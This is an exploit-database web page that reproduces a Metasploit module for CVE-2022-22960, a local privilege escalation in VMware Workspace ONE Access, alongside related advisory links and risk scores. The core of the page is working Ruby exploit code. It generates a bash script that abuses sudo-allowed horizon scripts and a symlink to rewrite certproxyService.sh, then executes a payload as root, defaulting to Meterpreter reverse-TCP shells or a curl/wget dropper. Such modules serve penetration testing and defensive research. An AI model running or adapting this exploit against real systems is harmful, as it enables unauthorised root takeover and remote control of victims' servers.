Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

VMware Workspace ONE Access Privilege Escalation Exploit

🗓️ 19 Apr 2023 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 293 Views

VMware Workspace ONE Access Privilege Escalation Exploit allows the user to modify certproxyService.sh script and escalate privileges to root access.

Related
Code
ReporterTitlePublishedViews
Family
0day.today		VMware Workspace ONE Remote Code Execution Exploit
18 Apr 202300:00
zdt
GithubExploit		Exploit for Code Injection in Vmware Identity_Manager
1 Jun 202219:33
githubexploit
ICS		Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control
2 Jun 202212:00
ics
ICS		Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems
18 Jul 202212:00
ics
ICS		2022 Top Routinely Exploited Vulnerabilities
3 Aug 202312:00
ics
ATTACKERKB		CVE-2022-22954
11 Apr 202200:00
attackerkb
ATTACKERKB		CVE-2022-22960
13 Apr 202200:00
attackerkb
BDU FSTEC		The vulnerability of the VMware Workspace ONE Access application management platform, the VMware Cloud Foundation virtualization platform, the VMware vRealize Automation virtual infrastructure management tool, the vRealize Suite Lifecycle Manager application lifecycle management software, and the VMware Identity Manager (vIDM) administration console—all of which are related to errors in the use of standard permissions—allow a perpetrator to increase their privileges.
8 Apr 202200:00
bdu_fstec
Circl		CVE-2022-22960
1 May 202221:40
circl
CISA KEV Catalog		VMware Multiple Products Privilege Escalation Vulnerability
15 Apr 202200:00
cisa_kev
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking

  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Post::Unix
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  TARGET_FILE = '/opt/vmware/certproxy/bin/certproxyService.sh'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'VMware Workspace ONE Access CVE-2022-22960',
          'Description' => %q{
            This module exploits CVE-2022-22960 which allows the user to overwrite the permissions of the
            certproxyService.sh script so that it can be modified by the horizon user. This allows a local attacker with
            the uid 1001 to escalate their privileges to root access.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'mr_me', # Discovery & PoC
            'jheysel-r7' # Metasploit Module
          ],
          'Platform' => [ 'linux', 'unix' ],
          'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
          'SessionTypes' => ['shell', 'meterpreter'],
          'Targets' => [
            [
              'Unix Command',
              {
                'Platform' => 'unix',
                'Arch' => ARCH_CMD,
                'Type' => :unix_cmd,
                'DefaultOptions' => {
                  'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
                }
              }
            ],
            [
              'Linux Dropper',
              {
                'Platform' => 'linux',
                'Arch' => [ARCH_X64],
                'Type' => :linux_dropper,
                'CmdStagerFlavor' => %i[curl wget],
                'DefaultOptions' => {
                  'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
                }
              }
            ]
          ],
          'Privileged' => true,
          'DefaultTarget' => 0,
          'References' => [
            [ 'CVE', '2022-22960' ],
            ['URL', 'https://srcincite.io/blog/2022/08/11/i-am-whoever-i-say-i-am-infiltrating-vmware-workspace-one-access-using-a-0-click-exploit.html#dbconnectioncheckcontroller-dbcheck-jdbc-injection-remote-code-execution'],
            ['URL', 'https://github.com/sourceincite/hekate/'],
            ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html']
          ],
          'DisclosureDate' => '2022-04-06',
          'Notes' => {
            # We're corrupting certproxyService.sh, if restoring the contents fails it won't work.
            'Stability' => [CRASH_SAFE],
            'Reliability' => [REPEATABLE_SESSION],
            'SideEffects' => [ARTIFACTS_ON_DISK]
          }
        }
      )
    )
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  def lpe_trigger(execute_payload)
    cert_filename = Rex::Text.rand_text_alpha(4..12)
    file_contents = <<~EOF
      #!/bin/bash
      cp #{TARGET_FILE} #{datastore['WritableDir']}/#{@certproxy_backup}
      sudo /usr/local/horizon/scripts/publishCaCert.hzn #{TARGET_FILE} #{cert_filename}
      mkdir #{cert_filename}
      ln -s #{TARGET_FILE} #{cert_filename}/debugConfig.txt
      sudo /usr/local/horizon/scripts/gatherConfig.hzn #{cert_filename}
      rm -rf #{cert_filename}
      chmod 755 #{TARGET_FILE}
      echo "mv /etc/ssl/certs/#{cert_filename} #{TARGET_FILE}" > #{TARGET_FILE}
      echo "chown root:root #{TARGET_FILE}" >> #{TARGET_FILE}
      echo "chmod 640 #{TARGET_FILE}" >> #{TARGET_FILE}
      echo "#{execute_payload}" >> #{TARGET_FILE}
      echo "mv #{datastore['WritableDir']}/#{@certproxy_backup} #{TARGET_FILE} && chmod 500 #{TARGET_FILE} && chown root:root #{TARGET_FILE}" >> #{TARGET_FILE}#{' '}
      sudo #{TARGET_FILE}
    EOF
    file_contents
  end

  def check
    unless whoami == 'horizon'
      return CheckCode::Safe('Not running as the horizon user.')
    end

    test = cmd_exec("sudo #{TARGET_FILE}")
    unless test.include? 'basename: missing operand'
      CheckCode::Safe
    end

    CheckCode::Appears('vulnerable')
  end

  def exploit
    @certproxy_backup = Rex::Text.rand_text_alpha(4..12)
    payload_filename = Rex::Text.rand_text_alpha(4..12) + '.sh'
    trigger_filename = Rex::Text.rand_text_alpha(4..12) + '.sh'

    case target['Type']
    when :unix_cmd
      execute_payload = payload.encoded
    when :linux_dropper
      payload_path = "#{datastore['WritableDir']}/#{payload_filename}"
      upload_and_chmodx(payload_path, generate_payload_exe)
      execute_payload = "#{datastore['WritableDir']}/#{payload_filename}"
      register_file_for_cleanup(payload_path)
    else
      fail_with(Failure::BadConfig, 'Invalid target specified')
    end

    lpe_trigger_data = lpe_trigger(execute_payload)

    upload_and_chmodx("#{datastore['WritableDir']}/#{trigger_filename}", lpe_trigger_data)
    register_file_for_cleanup("#{datastore['WritableDir']}/#{trigger_filename}")

    print_status('Triggering the payload...')
    cmd_exec("cd #{datastore['WritableDir']}; ./#{trigger_filename}")
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Apr 2023 00:00Current
8.5High risk
Vulners AI Score8.5
CVSS 27.2
CVSS 3.17.8
EPSS0.72491
vmware workspace one accessprivilege escalationexploitcve-2022-22960metasploitlinuxunixremote code executionsecurity advisoryfile permissionsscript modificationroot accessvulnerabilityinformation security
293